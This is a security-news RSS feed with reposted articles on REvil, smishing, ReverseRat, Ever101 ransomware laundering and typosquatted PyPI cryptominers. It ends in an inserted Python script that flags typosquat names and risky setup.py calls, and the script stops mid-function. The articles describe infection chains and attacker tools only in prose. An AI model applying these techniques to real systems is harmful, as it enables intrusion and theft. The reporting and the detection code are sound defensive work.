<?xml version="1.0"?>
<rss version="2.0"><channel><title><![CDATA[News: Security & Privacy News]]></title><link>https://nsaneforums.com/news/security-privacy-news/page/160/?d=2</link><description><![CDATA[News: Security & Privacy News]]></description><language>en</language><item><title>Healthcare giant Grupo Fleury hit by REvil ransomware attack</title><link>https://nsaneforums.com/news/security-privacy-news/healthcare-giant-grupo-fleury-hit-by-revil-ransomware-attack-r817/</link><description><![CDATA[<h1>
	Healthcare giant Grupo Fleury hit by REvil ransomware attack
</h1>

<div>
	<p>
		 
	</p>

	<p>
		Brazilian medical diagnostic company Grupo Fleury has suffered a ransomware attack that has disrupted business operations after the company took its systems offline.
	</p>

	<p>
		 
	</p>

	<p>
		Grupo Fleury is the largest medical diagnostics company in Brazil, with over 200 service centers and more than 10,000 employees. The company performs approximately 75 million clinical exams in a year.
	</p>

	<p>
		 
	</p>

	<p>
		Starting yesterday, the Fleury website began displaying an alert warning that the company had suffered an attack and that its systems are no longer accessible.
	</p>

	<div>
		<figure>
			<img alt="Announcement on the website about the cyberattack" data-ratio="64.31" src="https://www.bleepstatic.com/images/news/ransomware/attacks/g/grupo-fleury/website-announcement.jpg">
			<figcaption>
				Announcement on the website about the cyberattack
			</figcaption>
		</figure>
	</div>

	<p>
		"Please be advised that our systems are currently unavailable and that we are prioritizing the restoration of services," read the alert translated into English.
	</p>

	<p>
		 
	</p>

	<p>
		"The causes of this unavailability originated from the attempted external attack on our systems, which are having operations reestablished with all the resources and technical efforts for the rapid standardization of our services."
	</p>

	<p>
		 
	</p>

	<p>
		With their systems shut down, business operations are disrupted, and patients are unable to schedule lab tests or other clinical exams online.
	</p>

	<p>
		 
	</p>

	<p>
		If you have first-hand information about this or other unreported cyberattacks, you can confidentially contact us on Signal at <a href="tel:+16469613731" target="_blank" rel="">+16469613731</a> or on Wire at @lawrenceabrams-bc.
	</p>

	<h2>
		Grupo Fleury allegedly hit by ransomware
	</h2>

	<p>
		While local media has received confirmation that the company has suffered a cyberattack, Grupo Fleury has not officially confirmed a ransomware attack.
	</p>

	<p>
		 
	</p>

	<p>
		However, multiple cybersecurity sources have told BleepingComputer that Grupo Fleury suffered an attack by the ransomware operation known as REvil, also known as Sodinokibi.
	</p>

	<p>
		 
	</p>

	<p>
		This ransomware operation is responsible for numerous high-profile attacks, including Brazil's <a href="https://www.bleepingcomputer.com/news/security/brazils-rio-grande-do-sul-court-system-hit-by-revil-ransomware/" target="_blank" rel="external nofollow">Rio Grande do Sul court system</a>, <a href="https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-us-nuclear-weapons-contractor/" target="_blank" rel="external nofollow">nuclear weapons contractor Sol Oriens</a>, and <a href="https://www.bleepingcomputer.com/news/security/jbs-paid-11-million-to-revil-ransomware-225m-first-demanded/" target="_blank" rel="external nofollow">JBS</a>, the world's largest meat producer.
	</p>

	<p>
		 
	</p>

	<p>
		In a sample of the ransomware used in the attack and shared with BleepingComputer, the REvil ransomware operation is demanding $5 million to receive a decryptor and not leak allegedly stolen files.
	</p>

	<div>
		<figure>
			<img alt="Ransom demand from sample shared with BleepingComputer" data-ratio="41.67" src="https://www.bleepstatic.com/images/news/ransomware/attacks/g/grupo-fleury/ransom-demand.jpg">
			<figcaption>
				Ransom demand from sample shared with BleepingComputer
			</figcaption>
		</figure>
	</div>

	<p>
		REvil is known for stealing files before encrypting devices and then using the stolen data as leverage to get a company to pay the ransom.
	</p>

	<p>
		 
	</p>

	<p>
		From the ransomware sample, no proof of stolen data or mention of the victim's name has been shared by the attackers at this time.
	</p>

	<p>
		 
	</p>

	<p>
		If data was stolen, it is of significant concern, as Grupo Fleury holds enormous amounts of personal and medical data about its patients.
	</p>

	<p>
		 
	</p>

	<p>
		BleepingComputer has contacted Grupo Fleury with further questions but has not received a response at this time.
	</p>
</div>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/healthcare-giant-grupo-fleury-hit-by-revil-ransomware-attack/" rel="external nofollow">Healthcare giant Grupo Fleury hit by REvil ransomware attack</a>
</p>
]]></description><guid isPermaLink="false">817</guid><pubDate>Wed, 23 Jun 2021 21:33:41 +0000</pubDate></item><item><title>Scammer arrested for phishing operation, sent 25,000 texts in a day</title><link>https://nsaneforums.com/news/security-privacy-news/scammer-arrested-for-phishing-operation-sent-25000-texts-in-a-day-r816/</link><description><![CDATA[<h1>
	Scammer arrested for phishing operation, sent 25,000 texts in a day
</h1>

<div>
	<p>
		<img alt="Smishing operation sends over 25,000 text messages a day" data-ratio="55.97" style="width: 720px; height: 403px;" width="720" src="https://www.bleepstatic.com/content/posts/2021/06/23/ManchesterHotel_EE_phish.jpg">
	</p>

	<p>
		 
	</p>

	<p>
		Police arrested an individual last week for sending fraudulent text messages to thousands of people to obtain their banking details and defraud them.
	</p>

	<p>
		 
	</p>

	<p>
		It is estimated that the man sent more than 25,000 short text messages in one day, from SIM cards on multiple mobile devices.
	</p>

	<h3>
		Mobile phone contacts galore
	</h3>

	<p>
		The arrest took place on June 17 at a hotel in Manchester, UK, where the 21-year-old fraudster had taken a room and used it as the headquarters of the phishing operation.
	</p>

	<p>
		 
	</p>

	<p>
		The fraudster is likely part of a larger gang and is probably just a foot soldier doing the risky part of the business for the more important players that run the larger operation.
	</p>

	<p>
		 
	</p>

	<p>
		Police officers found electronic equipment that could be used for SMS phishing, also known as smishing. The text messages claimed to be from the Hermes parcel delivery company.
	</p>

	<p>
		 
	</p>

	<p>
		According to the police, the operation was quite large and could deliver tens of thousands of fraudulent messages every day. It is estimated that close to 26,000 texts were sent on the day of the arrest.
	</p>

	<p>
		 
	</p>

	<p>
		At least some of the messages were sent through EE, one of the largest mobile network operators and internet service providers in the United Kingdom, with over 27 million subscribers.
	</p>

	<p>
		 
	</p>

	<p>
		The messages informed potential victims of a missed delivery and asked for banking information. The number of individuals falling victim to the scam remains undisclosed.
	</p>

	<p>
		 
	</p>

	<p>
		After examining the seized devices, the <a href="https://www.gmp.police.uk/news/greater-manchester/news/news/2021/june/man-arrested-in-manchester-hotel-after-over-25000-phishing-messages-sent-in-one-day/" rel="external nofollow">police say</a> that they stored a total of 44,000 mobile phone contacts.
	</p>

	<p>
		 
	</p>

	<p>
		<img alt="Potential victim database had 44,000 mobile phone contacts" data-ratio="55.97" style="width: 720px; height: 403px;" width="720" src="https://www.bleepstatic.com/images/news/u/1100723/Phishing/ManchesterHotel_EE_phish.jpeg">
	</p>

	<p>
		 
	</p>

	<p>
		Despite the size of the phishing operation, the man got caught when the hotel staff deemed him suspicious for carrying a large number of cables in a bag and alerted the police in Manchester.
	</p>

	<div>
		<p>
			 
		</p>

		<p>
			“What we have uncovered here are potentially the components of a highly sophisticated and authentic scam that I know many people not just in Greater Manchester but across the country have been potential victims of in recent weeks and months” - Mark Astbury, Detective Inspector of Greater Manchester Police’s City of Manchester Central division
		</p>
	</div>

	<p>
		 
	</p>

	<p>
		People in the UK receiving suspicious text messages allegedly from Hermes should <a href="https://www.actionfraud.police.uk/report-phishing" rel="external nofollow">report the phishing attempt</a>, contact the police online, or call 101.
	</p>

	<p>
		 
	</p>

	<p>
		As a side note, the fraudster's opsec skills are not the only ones needing improvement. Phishing kit expert <a href="https://twitter.com/JCyberSec_/status/1406981699087503360" rel="external nofollow" target="_blank">JCyberSec</a> noticed that the Manchester police did not remove the metadata from the image published with the press release. Although it is not the case here, such metadata can include potentially sensitive information.
	</p>
</div>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/scammer-arrested-for-phishing-operation-sent-25-000-texts-in-a-day/" rel="external nofollow">Scammer arrested for phishing operation, sent 25,000 texts in a day</a>
</p>
]]></description><guid isPermaLink="false">816</guid><pubDate>Wed, 23 Jun 2021 21:31:26 +0000</pubDate></item><item><title>John McAfee found dead by apparent suicide in Barcelona prison cell</title><link>https://nsaneforums.com/news/security-privacy-news/john-mcafee-found-dead-by-apparent-suicide-in-barcelona-prison-cell-r814/</link><description><![CDATA[<header>
	<h1 itemprop="headline">
		John McAfee found dead by apparent suicide in Barcelona prison cell
	</h1>

	<h2 itemprop="description">
		McAfee's larger-than-life and often illegal antics came to define his later years.
	</h2>
</header>

<section>
	<div itemprop="articleBody">
		<figure>
			<img alt="A casually dressed and sunweathered man reclines with a cigarette on a yacht." data-ratio="74.03" src="https://cdn.arstechnica.net/wp-content/uploads/2021/03/GettyImages-1154007456-800x533.jpg">
			<figcaption>
				<div>
					John McAfee on his yacht off the coast of Cuba in 2019.
				</div>

				<div>
					Adalberto ROQUE / AFP / Getty
				</div>
			</figcaption>
		</figure>

		<p>
			 
		</p>

		<p>
			John McAfee—the antivirus tycoon whose eccentric, larger-than-life, and often illegal antics on yachts and in tropical rain forests came to define him in later years—took his own life in a Spanish prison cell while awaiting extradition to the US. He was 75.
		</p>

		<p>
			 
		</p>

		<p>
			The death was first reported <a href="https://elpais.com/economia/2021-06-23/el-fundador-del-antivirus-mcafee-john-mcafee-se-suicida-en-una-prision-de-barcelona.html" rel="external nofollow">by El Pais</a> and later <a href="https://www.reuters.com/legal/government/john-mcafee-found-dead-prison-after-spanish-court-allows-extradition-2021-06-23/" rel="external nofollow">by Reuters</a>, both of which cited law enforcement sources in Barcelona. Multiple news agencies also reported the death.
		</p>

		<p>
			 
		</p>

		<p>
			According to El Pais, prison personnel found McAfee hanging in his cell and provided emergency medical services but were unable to save his life.
		</p>

		<p>
			 
		</p>

		<p>
			The reports came hours after revelations surfaced that McAfee would be extradited to the US to face federal indictments—one <a href="https://arstechnica.com/tech-policy/2021/03/feds-indict-john-mcafee-for-cryptocurrency-pump-and-dump-fraud/" rel="external nofollow">filed in March</a> and the <a href="https://arstechnica.com/tech-policy/2020/10/john-mcafee-arrested-indicted-on-tax-evasion-charges-sued-for-fraud/" rel="external nofollow">other in October</a>—alleging a cryptocurrency pump-and-dump and tax evasion on millions of dollars in income.
		</p>

		<p>
			 
		</p>

		<p>
			McAfee was <a href="https://arstechnica.com/tech-policy/2020/10/john-mcafee-arrested-indicted-on-tax-evasion-charges-sued-for-fraud/" rel="external nofollow">arrested in October</a> at a Barcelona airport after dodging an international manhunt. He had been fighting extradition ever since. On Wednesday, Reuters reported that Spain's high court had approved the extradition the US was seeking, a decision revealed in a court filing that day.
		</p>

		<p>
			 
		</p>

		<p>
			McAfee had been awaiting extradition when he died, police sources told El Pais.
		</p>
	</div>
</section>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/gadgets/2021/06/john-mcafee-the-eccentric-av-tycoon-dead-at-75-by-apparent-suicide/" rel="external nofollow">John McAfee found dead by apparent suicide in Barcelona prison cell</a>
</p>
]]></description><guid isPermaLink="false">814</guid><pubDate>Wed, 23 Jun 2021 21:17:29 +0000</pubDate></item><item><title>Pakistan-linked hackers targeted Indian power company with ReverseRat</title><link>https://nsaneforums.com/news/security-privacy-news/pakistan-linked-hackers-targeted-indian-power-company-with-reverserat-r804/</link><description><![CDATA[<p>
	<span style="font-size:22px;"><strong>Pakistan-linked hackers targeted Indian power company with ReverseRat</strong></span>
</p>

<p>
	 
</p>

<p>
	A threat actor with suspected ties to Pakistan has been striking government and energy organizations in the South and Central Asia regions to deploy a remote access trojan on compromised Windows systems, according to new research.
</p>

<p>
	 
</p>

<p>
	"Most of the organizations that exhibited signs of compromise were in India, and a small number were in Afghanistan," Lumen's Black Lotus Labs said in a Tuesday analysis. "The potentially compromised victims aligned with the government and power utility verticals."
</p>

<p>
	 
</p>

<p>
	Some of the victims include a foreign government organization, a power transmission organization, and a power generation and transmission organization. The covert operation is said to have begun at least in January 2021.
</p>

<p>
	 
</p>

<p>
	The intrusions are notable for several reasons: beyond their highly targeted nature, the tactics, techniques, and procedures (TTPs) adopted by the adversary rely on repurposed open-source code and on compromised domains in the same country as the targeted entity to host the malicious files.
</p>

<p>
	 
</p>

<p>
	At the same time, the group has been careful to hide its activity by modifying registry keys, which lets it maintain persistence on the target device without attracting attention.
</p>

<p>
	 
</p>

<p>
	Explaining the multi-step infection chain, Lumen noted the campaign "resulted in the victim downloading two agents; one resided in-memory, while the second was side-loaded, granting threat actor persistence on the infected workstations."
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="pakistani-hackers.jpg" class="ipsImage" data-ratio="42.64" height="303" width="720" src="https://thehackernews.com/images/-6X3QtvkF-pc/YNNElvNe9tI/AAAAAAAAC90/6wLjdbZcVwIjMvZ9DUWfmZ8IQGSXMCmhgCLcBGAsYHQ/s728-e1000/pakistani-hackers.jpg" />
</p>

<p style="text-align:center;">
	 
</p>

<p>
	The attack commences with a malicious link sent via phishing emails or messages that, when clicked, downloads a ZIP archive file containing a Microsoft shortcut file (.lnk) and a decoy PDF file from a compromised domain.
</p>

<p>
	 
</p>

<p>
	The shortcut file, besides displaying the benign document to the unsuspecting recipient, also takes care of stealthily fetching and running an HTA (HTML application) file from the same compromised website.
</p>

<p>
	 
</p>

<p>
	The lure documents largely describe events relevant to India: most are disguised as a user manual for registering and booking a COVID-19 vaccine appointment through the CoWIN online portal, while a few others masquerade as material from the Bombay Sappers, a regiment of the Corps of Engineers of the Indian Army.
</p>

<p>
	 
</p>

<p>
	Irrespective of the PDF document displayed to the victim, the HTA file — itself a JavaScript code based on a GitHub project called CactusTorch — is leveraged to inject a 32-bit shellcode into a running process to ultimately install a .NET backdoor called ReverseRat that runs the typical spyware gamut, with capabilities to capture screenshots, terminate processes, execute arbitrary executables, perform file operations, and upload data to a remote server.
</p>

<p>
	 
</p>

<p>
	The custom-developed framework also comes with a third component in which a second HTA file is downloaded from the same domain to deploy the open-source AllaKore remote agent, potentially in an alternative attempt to maintain access to the compromised network.
</p>

<p>
	 
</p>

<p>
	"While this threat actor's targets have thus far remained within the South and Central Asian regions, they have proven effective at gaining access to networks of interest," the researchers said. "Despite previously relying upon open-source frameworks such as AllaKore, the actor was able to remain effective and expand its capabilities with the development of the Svchostt agent and other components of the ReverseRat project."
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2021/06/pakistan-linked-hackers-targeted-indian.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">804</guid><pubDate>Wed, 23 Jun 2021 14:54:13 +0000</pubDate></item><item><title>Brave Search Beta is now available publicly</title><link>https://nsaneforums.com/news/security-privacy-news/brave-search-beta-is-now-available-publicly-r792/</link><description><![CDATA[<h1>
	Brave Search Beta is now available publicly
</h1>

<div>
	<p>
		 
	</p>

	<p>
		<a data-wpel-link="external" href="https://search.brave.com/" rel="external nofollow" target="_blank">Brave Search</a>, a new search engine by the makers of Brave Browser, is now available publicly. Brave revealed some time ago that it was working on an independent search engine that would make use of its own index and not be dependent on Google, Bing or other search engines.
	</p>

	<p>
		 
	</p>

	<p>
		A private beta launched some time ago, and today marks the end of that private beta period. Anyone may open Brave Search to use the search engine. It is a beta product right now, but should work fine in many cases.
	</p>

	<p>
		 
	</p>

	<p>
		<img alt="brave search beta" data-ratio="75.10" loading="lazy" sizes="(max-width: 1800px) 100vw, 1800px" srcset="https://mk0ghacksnety2pjrgh8.kinstacdn.com/wp-content/uploads/2021/06/brave-search-beta.png 1800w, https://mk0ghacksnety2pjrgh8.kinstacdn.com/wp-content/uploads/2021/06/brave-search-beta-1536x973.png 1536w" width="719" src="https://mk0ghacksnety2pjrgh8.kinstacdn.com/wp-content/uploads/2021/06/brave-search-beta.png">
	</p>

	<p>
		 
	</p>

	<p>
		To better understand what Brave Search offers, one has to go back to March 2021. Brave <a data-wpel-link="external" href="https://brave.com/brave-search/" rel="external nofollow" target="_blank">announced</a> that it had acquired Tailcat, an open search engine developed "by the team formerly responsible for the privacy search and browser products at Cliqz."
	</p>

	<p>
		 
	</p>

	<p>
		Tailcat uses its own independent index, and that sets it apart from third-party solutions such as DuckDuckGo or Startpage, which rely on the products of Big Tech companies such as Bing or Google.
	</p>

	<p>
		 
	</p>

	<p>
		Brave promises that its search engine will provide users with quality results without compromising user privacy. The search engine does not record user IP addresses, nor does it use personally identifiable information to alter the search results.
	</p>

	<p>
		 
	</p>

	<p>
		Brave Search is developed using the same principles as the Brave browser:
	</p>

	<p>
		 
	</p>

	<ul>
		<li>
			Private: does not track or profile users.
		</li>
		<li>
			User-First: Users come first, not advertising or data industries.
		</li>
		<li>
			Choice: Private ads will come to search, similarly to how they are handled in Brave Browser. An ad-free paid search option will also become available.
		</li>
		<li>
			Independent: Brave Search will use anonymized contributions to improve and refine Brave Search.
		</li>
		<li>
			Transparent: Secret methods or algorithms won't be used to bias results.
		</li>
		<li>
			Seamless: integration with the Brave Browser.
		</li>
		<li>
			Open: Other search engines may use Brave Search.
		</li>
	</ul>

	<p>
		 
	</p>

	<p>
		Brave Search works like other search engines when you open it. You may type a search query, get suggestions, and will get results once you start the search.
	</p>

	<p>
		 
	</p>

	<p>
		The search results page resembles that of other search engines as well. You find options to switch from the "all" results listing to images, news or videos, and may filter results by country, safe search or time.
	</p>

	<p>
		 
	</p>

	<p>
		One interesting feature of Brave Search is that it may fill the results using data from third-party search engines, if its own set of data is not sufficient.
	</p>

	<p>
		 
	</p>

	<p>
		Select the cogwheel icon on the search results page to display the number of results that come from Brave's own index (in percent).
	</p>

	<p>
		 
	</p>

	<p>
		<img alt="brave search settings" data-ratio="75.10" loading="lazy" sizes="(max-width: 1800px) 100vw, 1800px" srcset="https://mk0ghacksnety2pjrgh8.kinstacdn.com/wp-content/uploads/2021/06/brave-search-settings.png 1800w, https://mk0ghacksnety2pjrgh8.kinstacdn.com/wp-content/uploads/2021/06/brave-search-settings-1536x973.png 1536w" width="719" src="https://mk0ghacksnety2pjrgh8.kinstacdn.com/wp-content/uploads/2021/06/brave-search-settings.png">
	</p>

	<p>
		 
	</p>

	<p>
		Another interesting feature of Brave Search is the option to set a location manually. By default, Brave uses what it calls anonymous local results where necessary. Some queries only work if the location is known: when you search for "restaurants near me", for example, the results would not make sense without a location. Brave uses the IP address for this but won't share or store it.
	</p>

	<p>
		 
	</p>

	<p>
		You can turn this off in <a data-wpel-link="external" href="https://search.brave.com/settings" rel="external nofollow" target="_blank">the settings</a> or set a location manually that you want to be used as your location.
	</p>

	<p>
		 
	</p>

	<p>
		Still in the settings, you may disable the collection of anonymous usage metrics and Google fallback mixing. Disabling the latter prevents Google results from being mixed into the search results when Brave's own index fails to deliver enough results on its own.
	</p>

	<p>
		 
	</p>

	<p>
		Brave Search uses an anonymous cookie to save preferences (when you make changes in the settings). A help page <a data-wpel-link="external" href="https://search.brave.com/help/anonymous-cookies" rel="external nofollow" target="_blank">provides details on that</a>.
	</p>

	<p>
		 
	</p>

	<p>
		Brave Search has no ads currently. Search results are displayed in blocks, and the blocks are clearly distinguishable from one another.
	</p>

	<p>
		 
	</p>

	<p>
		Some queries may display an option to display local results only, others may display widgets, e.g. the chart of a stock.
	</p>

	<p>
		 
	</p>

	<p>
		<img alt="brave search finance" data-ratio="62.92" loading="lazy" sizes="(max-width: 1800px) 100vw, 1800px" srcset="https://mk0ghacksnety2pjrgh8.kinstacdn.com/wp-content/uploads/2021/06/brave-search-finance.png 1800w, https://mk0ghacksnety2pjrgh8.kinstacdn.com/wp-content/uploads/2021/06/brave-search-finance-1536x973.png 1536w" style="width: 720px; height: 453px;" width="720" src="https://mk0ghacksnety2pjrgh8.kinstacdn.com/wp-content/uploads/2021/06/brave-search-finance.png">
	</p>

	<p>
		 
	</p>

	<p>
		<strong>Closing Words</strong>
	</p>

	<p>
		 
	</p>

	<p>
		Brave Search is a beta product. I had the chance to use the search engine for several weeks on one device, and found that it often returned good results. The fact that Brave maintains its own index is a plus, as it has full control over the results, and since Brave claims it will provide unbiased search results, it may soon become a go-to search engine for users who prefer that approach.
	</p>

	<p>
		 
	</p>

	<p>
		The Brave approach is interesting, especially since it may establish another source of revenue for the company in the long run. Not everyone is ready to pay for an ad-free search engine, but if you'd get unfiltered and unbiased results, it could certainly attract some users who are fed up with how the major search engines are run (especially in regards to bias and advertising).
	</p>
</div>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.ghacks.net/2021/06/22/brave-search-beta-is-now-available-publicly/" rel="external nofollow">Brave Search Beta is now available publicly</a>
</p>
]]></description><guid isPermaLink="false">792</guid><pubDate>Tue, 22 Jun 2021 21:28:41 +0000</pubDate></item><item><title>Mysterious ransomware payment traced to a sensual massage site</title><link>https://nsaneforums.com/news/security-privacy-news/mysterious-ransomware-payment-traced-to-a-sensual-massage-site-r791/</link><description><![CDATA[<h1>
	Mysterious ransomware payment traced to a sensual massage site
</h1>

<div>
	<p>
		 
	</p>

	<p>
		A ransomware attack targeting an Israeli company has led researchers to trace a portion of the ransom payment to a website promoting sensual massages.
	</p>

	<p>
		 
	</p>

	<p>
		The attack was conducted by a relatively new ransomware operation known as Ever101, which compromised an Israeli computer farm and proceeded to encrypt its devices.
	</p>

	<p>
		 
	</p>

	<p>
		In a new report by Israeli cybersecurity firms <a href="https://profero.io/" rel="external nofollow" target="_blank">Profero</a> and <a href="https://www.securityjoes.com/" rel="external nofollow" target="_blank">Security Joes</a>, who performed incident response on the attack, Ever101 is believed to be a variant of the Everbe or Paymen45 ransomware.
	</p>

	<p>
		 
	</p>

	<p>
		When encrypting files, the ransomware will append the .ever101 extension and drop a ransom note named !=READMY=!.txt in each folder on the computer.
	</p>

	<div>
		<figure>
			<img alt="Example Ever101 ransom note" data-ratio="75.10" src="https://www.bleepstatic.com/images/news/ransomware/e/ever101/ever101-ransom-note.jpg">
			<figcaption>
				Example Ever101 ransom note
			</figcaption>
		</figure>
	</div>

	<p>
		While investigating one of the infected machines, the researchers found a 'Music' folder that contained various tools used during the attack, providing insight into the threat actor's tactics, techniques, and procedures.
	</p>

	<p>
		 
	</p>

	<p>
		"During our investigation of the infected machines, we came across what seemed to be a treasure trove of information stored in the Music folder. It consisted of the ransomware binary itself, along with several other files—some encrypted, some not—that we believe the threat actors used to gather intelligence and propagate through the network," explains Profero's and Security Joe's <a href="https://shared-public-reports.s3.eu-west-1.amazonaws.com/Secrets_behind_the_mysterious_ever101_ransomware.pdf" rel="external nofollow" target="_blank">report</a>.
	</p>

	<p>
		 
	</p>

	<p>
		The known tools used by the Ever101 gang include:
	</p>

	<p>
		 
	</p>

	<ul>
		<li>
			xDedicLogCleaner - Cleans all Windows event logs, system logs, and the temp folder.
		</li>
		<li>
			PH64.exe - 64-bit version of the Process Hacker program.
		</li>
		<li>
			Cobalt Strike - The threat actors deployed Cobalt Strike to provide remote access to machines and perform surveillance on the network. In this particular attack, the Cobalt Strike beacon was embedded in a WEXTRACT.exe file with an expired Microsoft signature.
		</li>
		<li>
			SystemBC - SystemBC was used to proxy Cobalt Strike traffic through a SOCKS5 proxy to avoid detection.
		</li>
	</ul>

	<p>
		 
	</p>

	<p>
		Other tools were also found but were encrypted by the ransomware. Based on the names and other characteristics, the researchers believe the ransomware gang used the following tools as well:
	</p>

	<p>
		 
	</p>

	<ul>
		<li>
			SoftPerfect Network Scanner - An IPv4/IPv6 network scanner.
		</li>
		<li>
			shadow.bat - Likely a batch file used to clear Shadow Volume Copies from the Windows device.
		</li>
		<li>
			NetworkShare_pre2.exe - Enumerates a Windows network for shared folders and drives.
		</li>
	</ul>

	<p>
		 
	</p>

	<p>
		Of interest is that some of the files shared by the attackers, such as WinRar, were localized in Arabic.
	</p>

	<div>
		<figure>
			<img alt="WinRar with Arabic localization" data-ratio="89.85" src="https://www.bleepstatic.com/images/news/ransomware/e/ever101/winrar-arabic.jpg">
			<figcaption>
				WinRar with Arabic localization
			</figcaption>
		</figure>
	</div>

	<p>
		Profero CEO Omri Moyal told BleepingComputer that he believes the Arabic localization to some of these tools is a "false flag."
	</p>

	<h2>
		Following the money to a sensual massage
	</h2>

	<p>
		Of particular interest is what the researchers discovered after they used CipherTrace to track the ransom payment as it flowed through different bitcoin wallets.
	</p>

	<p>
		 
	</p>

	<p>
		While tracing the payment, they found a small portion, 0.01378880 BTC or approximately $590, was sent to a 'Tip Jar' on the RubRatings site.
	</p>

	<p>
		 
	</p>

	<p>
		RubRatings is a website that allows "massage and body rub providers" in the USA to advertise their services, many of them offering sensual massages and showing barely nude pictures.
	</p>

	<p>
		 
	</p>

	<p>
		Each masseuse profile includes a Tip Jar button that allows customers to leave a bitcoin tip for their recent massage.
	</p>

	<div>
		<figure>
			<img alt="RubRatings Bitcoin Tip Jar" data-ratio="75.10" src="https://www.bleepstatic.com/images/news/ransomware/e/ever101/rubratings.jpg">
			<figcaption>
				RubRatings Bitcoin Tip Jar
			</figcaption>
		</figure>
	</div>

	<p>
		The researchers believe that some of the ransom payment went to an Ever101 operative in the USA, who then either used the coins to tip a masseuse or, more likely, used the site as a way to launder the ransom payment.
	</p>

	<p>
		 
	</p>

	<p>
		"The second possibility is that the provider on the site was used as another method of obfuscating the bitcoin movement," the researchers explain. "It could be that the provider who possesses the bitcoin wallet in question was working with the threat actor(s), but more likely, it is a fake account set up to enable money transfers." 
	</p>

	<p>
		 
	</p>

	<p>
		"The bitcoin in the wallet linked to RubRatings received the payment around 15:48 UTC, and it left the wallet just a few minutes later, at 15:51 UTC."
	</p>

	<p>
		 
	</p>

	<p>
		As bitcoin is becoming more easily traced, and even <a href="https://www.bleepingcomputer.com/news/security/us-recovers-most-of-colonial-pipelines-44m-ransomware-payment/" target="_blank" rel="external nofollow">recovered by law enforcement</a>, ransomware operations are looking for novel approaches to launder their ill-gotten gains.
	</p>

	<p>
		 
	</p>

	<p>
		It is likely that the threat actors created a fake account on RubRatings and were using the Tip Jar feature as a way to launder the ransom by making it look like a tip to a masseuse.
	</p>
</div>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/mysterious-ransomware-payment-traced-to-a-sensual-massage-site/" rel="external nofollow">Mysterious ransomware payment traced to a sensual massage site</a>
</p>
]]></description><guid isPermaLink="false">791</guid><pubDate>Tue, 22 Jun 2021 21:25:56 +0000</pubDate></item><item><title>Malicious PyPI packages hijack dev devices to mine cryptocurrency</title><link>https://nsaneforums.com/news/security-privacy-news/malicious-pypi-packages-hijack-dev-devices-to-mine-cryptocurrency-r790/</link><description><![CDATA[<h1>
	Malicious PyPI packages hijack dev devices to mine cryptocurrency
</h1>

<div>
	<p>
		 
	</p>

	<p>
		This week, multiple malicious packages that turned developers' workstations into cryptomining machines were caught in PyPI, the package repository for Python projects.
	</p>

	<p>
		 
	</p>

	<p>
		All malicious packages were published by the same account and tricked developers into downloading them thousands of times by using misspelled names of legitimate Python projects.
	</p>

	<h3>
		Bash script pulls in miner
	</h3>

	<p>
		A total of six packages containing malicious code infiltrated the Python Package Index (PyPI) in April:
	</p>

	<p>
		 
	</p>

	<ul>
		<li>
			maratlib
		</li>
		<li>
			maratlib1
		</li>
		<li>
			matplatlib-plus
		</li>
		<li>
			mllearnlib
		</li>
		<li>
			mplatlib
		</li>
		<li>
			learninglib
		</li>
	</ul>

	<p>
		 
	</p>

	<p>
		All came from user “nedog123”, and most of the names are misspellings of <a href="https://matplotlib.org/" rel="external nofollow">matplotlib</a>, the legitimate plotting library.
	</p>

	<p>
		 
	</p>

	<p>
		Ax Sharma, a security researcher at devops automation company Sonatype, analyzed the “maratlib” package in a <a href="https://blog.sonatype.com/sonatype-catches-new-pypi-cryptomining-malware-via-automated-detection" rel="external nofollow">blog post</a>, noting that it was used as a dependency by the other malicious components.
	</p>

	<p>
		 
	</p>

	<p>
		“For each of these packages, the malicious code is contained in the setup.py file which is a build script that runs during a package’s installation,” the researcher writes.
	</p>
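	<p>
		As an added example (not code from Sonatype, PyPI, or the packages discussed), the script below implements the two checks a practitioner would want after reading this: an edit-distance comparison that flags package names that are near-misses of well-known ones, and a static scan of a setup.py for install-time execution, which is where these packages hid their payload. The two setup.py samples inside it are constructed for the example and the URL in them is a placeholder.
	</p>

```python
"""Checks for the PyPI typosquatting pattern described above.

Added example for this page; not Sonatype's Release Integrity or any PyPI
tooling.  The two setup.py samples at the bottom are constructed.
"""
import ast
import re


def damerau_levenshtein(a, b):
    """Optimal-string-alignment distance: insertion, deletion, substitution
    and swap of two adjacent characters each cost 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,         # delete a[i-1]
                          d[i][j - 1] + 1,         # insert b[j-1]
                          d[i - 1][j - 1] + cost)  # substitute
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transpose
    return d[len(a)][len(b)]


def normalize(name):
    """PEP 503 normalisation (case, separators) plus removal of trailing
    digits and filler suffixes squatters bolt on ("maratlib1", "...-plus")."""
    n = re.sub(r"[-_.]+", "-", name.lower())
    return re.sub(r"(-(plus|pro|new|extra))?\d*$", "", n)


def typosquat_candidates(name, legit, max_distance=2):
    """[(legit_name, distance), ...] for well-known names within
    max_distance of the candidate; an exact match is the real package."""
    n = normalize(name)
    hits = []
    for real in legit:
        r = normalize(real)
        if r != n:
            dist = damerau_levenshtein(n, r)
            if dist <= max_distance:
                hits.append((real, dist))
    return sorted(hits, key=lambda h: h[1])


# Modules whose use inside setup.py almost always means install-time side effects.
RISKY_MODULES = {"os", "subprocess", "urllib", "requests", "socket", "base64"}


def suspicious_setup_py(source):
    """Static scan of setup.py text: calls into RISKY_MODULES, exec/eval,
    and a cmdclass= override (how a package hooks `pip install`)."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
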